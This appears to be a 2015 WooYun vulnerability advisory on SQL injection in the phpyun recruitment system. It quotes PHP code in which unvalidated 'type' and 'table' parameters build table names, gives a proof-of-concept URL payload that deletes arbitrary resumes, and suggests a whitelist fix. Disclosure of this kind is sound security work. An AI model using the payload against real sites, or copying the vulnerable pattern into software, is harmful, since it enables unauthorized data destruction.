当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(5) 关注此漏洞

缺陷编号: WooYun-2015-105024

漏洞标题: phpyun人才系(2015-02-03)Sql注入2枚(可删除任意简历)

相关厂商: php云人才系统

漏洞作者: JJ Fly

提交时间: 2015-04-02 11:12

公开时间: 2015-07-01 11:20

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

2人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-02: 细节已通知厂商并且等待厂商处理中
2015-04-02: 厂商已经确认,细节仅向厂商公开
2015-04-05: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-05-27: 细节向核心白帽子及相关领域专家公开
2015-06-06: 细节向普通白帽子公开
2015-06-16: 细节向实习白帽子公开
2015-07-01: 细节向公众公开

简要描述:

phpyun人才系(2015-02-03)Sql注入2枚(可删除任意简历)
无法绕过waf,也就获取不了敏感信息。

详细说明:

代码

/wap/member/model/index.class.php

code 区域
function addresume_action()//复制的较长,可直接略过。


	{


		if($this->config['user_enforce_identitycert']=="1")


		{


			$row=$this->obj->DB_select_once("resume","`idcard_pic`<>'' and `uid`='".$this->uid."'");


			if($row['idcard_status']!="1")


			{


				$data['msg']='请先登录电脑客户端完成身份认证!';


				$data['url']='index.php';


			}


		}


		if($_GET['type']&&intval($_GET['id'])){


			$nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'");


			if($nid)


			{


				$url=$_GET['type'];


				$this->obj->DB_update_all("user_resume","`$url`=`$url`-1","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");


				$resume_row=$this->obj->DB_select_once("user_resume","`eid`='".(int)$_GET['eid']."'");


				$this->obj->complete($resume_row);


				$data['msg']='删除成功!';


			}else{


				$data['msg']='删除失败!';


			}


			$data['url']='index.php?c=addresume&eid='.(int)$_GET['eid'];





		}


		if($_POST['submit']){


			$_POST=$this->post_trim_iconv($_POST);


			if($_POST['eid']>0){


				$table="resume_".$_POST['table'];


				$id=(int)$_POST['id'];


				$url=$_POST['table'];


				unset($_POST['submit']);


				unset($_POST['table']);


				unset($_POST['id']);


				if($_POST['syear'])


				{


					$_POST['sdate']=strtotime($_POST['syear']."-".$_POST['smouth']."-".$_POST['sday']);


					$_POST['edate']=strtotime($_POST['eyear']."-".$_POST['emouth']."-".$_POST['eday']);


					unset($_POST['syear']);


					unset($_POST['smouth']);


					unset($_POST['sday']);


					unset($_POST['eyear']);


					unset($_POST['emouth']);


					unset($_POST['eday']);


				}


				if($id)


				{


					$where['id']=$id;


					$where['uid']=$this->uid;


					$nid=$this->obj->update_once($table,$_POST,$where);


				}else{


					$_POST['uid']=$this->uid;


					$nid=$this->obj->insert_into($table,$_POST);


					$this->obj->DB_update_all("user_resume","`$url`=`$url`+1","`eid`='".(int)$_POST['eid']."' and `uid`='".$this->uid."'");


					$resume_row=$this->obj->DB_select_once("user_resume","`eid`='".(int)$_POST['eid']."'");


					$this->obj->complete($resume_row);


				}


				$nid?$data['msg']='保存成功!':$data['msg']='保存失败!';


				$data['url']=$nid?('index.php?c=addresume&eid='.(int)$_POST['eid']):'';


				$data['msg']=iconv('gbk','utf-8',$data['msg']);


				echo json_encode($data);die;


			} else{


				if($_POST['name']==""){


					$data['msg']='姓名不能为空!';


				}else if($_POST['sex']==""){


					$data['msg']='性别不能为空!';


				}else if($this->config['user_idcard']=="1"&&trim($_POST['idcard'])==""){


					$data['msg']='身份证号码不能为空!';


				}else if($_POST['living']==""){


					$data['msg']='现居住地不能为空!';


				}else{


					unset($_POST['submit']);


					$this->obj->delfiledir("../upload/tel/".$this->uid);


					$where['uid']=$this->uid;


					$nid=$this->obj->update_once("resume",$_POST,$where);


					if($nid){


						$this->obj->update_once("member",array('email'=>$_POST['email'],'moblie'=>$_POST['telphone']),$where);


						$this->obj->member_log("保存基本信息");


						$data['msg']='保存成功!';


						$data['url']='index.php?c=addresume';


					}else{


						$data['msg']='保存失败!';


						$data['url']='index.php?c=addresume';


					}


				}


			}


		}


		if(!$_GET['eid']&&$_POST['submit']==''){


			$num=$this->obj->DB_select_once("member_statis","`uid`='".$this->uid."'");


			$maxnum=$this->config['user_number']-$num['resume_num'];


			$confignum=$this->config['user_number'];


			if($maxnum<=0 &&$confignum!=""){


				$data['msg']='你的简历数已经超过系统设置的简历数了!';


				$data['url']='index.php?c=resume';


			}


		}else if($_GET['eid']){


			$row=$this->obj->DB_select_once("resume_expect","`id`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");


			include(PLUS_PATH."job.cache.php");


			$job_classid=@explode(",",$row['job_classid']);


			foreach($job_classid as $v){


				$jobname[]=$job_name[$v];


			}


			$jobname=@implode(",",$jobname);


			$this->yunset("row",$row);


			$this->yunset("jobname",$jobname);


			$skill=$this->obj->DB_select_all("resume_skill","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");


			$work=$this->obj->DB_select_all("resume_work","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");


			$project=$this->obj->DB_select_all("resume_project","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");


			$edu=$this->obj->DB_select_all("resume_edu","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");


			$training=$this->obj->DB_select_all("resume_training","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");


			$cert=$this->obj->DB_select_all("resume_cert","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");


			$other=$this->obj->DB_select_all("resume_other","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'");


			$this->yunset("skill",$skill);


			$this->yunset("work",$work);


			$this->yunset("project",$project);


			$this->yunset("edu",$edu);


			$this->yunset("training",$training);


			$this->yunset("cert",$cert);


			$this->yunset("other",$other);


		}


		$resume=$this->obj->DB_select_once("resume","`uid`='".$this->uid."'");


		$this->yunset("resume",$resume);


		$this->yunset("layer",$data);


		$CacheArr['user'] =array('userdata','userclass_name');


		$CacheArr['job'] =array('job_index','job_type','job_name');


		$CacheArr['city'] =array('city_index','city_type','city_name');


		$CacheArr['industry'] =array('industry_index','industry_name');


		$CacheArr=$this->CacheInclude($CacheArr);


		$this->waptpl('addresume');


	}



这里我们可以看到 。

code 区域
$nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'");





这里$_GET[‘type’]直接入库。

我们可以进行注入。



还有这个函数下面的内容

code 区域
$table="resume_".$_POST['table'];//重点、。。。。。


				$id=(int)$_POST['id'];


				$url=$_POST['table'];


				unset($_POST['submit']);


				unset($_POST['table']);


				unset($_POST['id']);


				if($_POST['syear'])


				{


					$_POST['sdate']=strtotime($_POST['syear']."-".$_POST['smouth']."-".$_POST['sday']);


					$_POST['edate']=strtotime($_POST['eyear']."-".$_POST['emouth']."-".$_POST['eday']);


					unset($_POST['syear']);


					unset($_POST['smouth']);


					unset($_POST['sday']);


					unset($_POST['eyear']);


					unset($_POST['emouth']);


					unset($_POST['eday']);


				}


				if($id)


				{


					$where['id']=$id;


					$where['uid']=$this->uid;


					$nid=$this->obj->update_once($table,$_POST,$where);





同理的还有下面这个函数

code 区域
function addresumeson_action()


	{


		if($_GET['id']){


			$row=$this->obj->DB_select_once("resume_".$_GET['type'],"`id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'");///重点。。。。。


			$this->yunset("row",$row);


		}


		$this->user_cache();


		$this->waptpl('addresumeson');


	}

漏洞证明:

如何删除任意简历。

简历在库中信息如下

图片1.png



我们来构造一下type=expect` where id=3#

Url

code 区域
http://localhost/phpyun/wap/member/index.php?c=addresume&id=1&type=expect%60%20where%20id%3D3%23





图片3.png



图片4.png

修复方案:

添加一个 in_array()

版权声明:转载请注明来源 JJ Fly@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-04-02 11:18

厂商回复:

感谢您的提供,我们会尽快修复!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录